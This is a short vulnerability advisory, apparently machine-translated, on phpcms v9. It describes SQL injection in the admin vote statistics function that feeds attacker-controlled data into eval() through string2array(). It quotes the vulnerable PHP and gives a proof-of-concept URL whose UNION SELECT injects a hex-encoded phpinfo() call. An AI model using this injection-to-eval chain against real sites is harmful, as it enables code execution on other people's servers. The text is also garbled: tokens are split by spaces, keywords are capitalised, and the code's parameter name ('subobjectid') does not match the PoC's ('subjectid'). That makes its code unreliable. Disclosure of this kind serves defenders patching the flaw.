Phpcms v9 background (SQL inj) 2 (code exec) Vulnerability
By flyh4t www.2cto.com
In phpcms v9, The string2array () function uses the eval function, which may cause code execution vulnerabilities in multiple places.
Function string2array ($ data ){
If ($ data = '') return array ();
Eval ("\ $ array = $ data ;");
Return $ array;
}
For example, voting result Statistics (background permissions required)
/Moudles/vote. php
/**
* Vote result Statistics
*/
Public function statistics (){
$ Subjectid = $ _ GET ['subobjectid'];
$ Show_validator = $ show_scroll = $ show_header = true;
// Obtain the voting information
$ Sdb = pc_base: load_model ('vote _ data_model '); // load the voting statistics data model.
$ Infos = $ sdb-> select ("subjectid = $ subjectid", 'data'); // $ subjectid not filtered
// Create an array to store new combined data
$ Total = 0;
$ Vote_data = array ();
$ Vote_data ['Total'] = 0; // total number of all voting options
$ Vote_data ['votes '] = 0; // Number of votes
// Cycle the voting records of each member
Foreach ($ infos as $ subjectid_arr) {// results of vulnerability control through SQL Injection
Extract ($ subjectid_arr );
$ Arr = string2array ($ data); // enter the eval function
Foreach ($ arr as $ key => $ values ){
$ Vote_data [$ key] + = 1;
}
$ Total + = array_sum ($ arr );
$ Vote_data ['votes '] ++;
}
$ Vote_data ['Total'] = $ total;
// Select the voting option
$ Options = $ this-> db2-> get_options ($ subjectid );
Include $ this-> admin_tpl ('vote _ statistics ');
}
Poc code
Index. php? M = vote & c = vote & a = statistics & show_type = 1 & subjectid = 0 union select 0x706870696E666F2829/* & siteid = 1 & pc_hash = LFeCIl
Pc_hash is different each time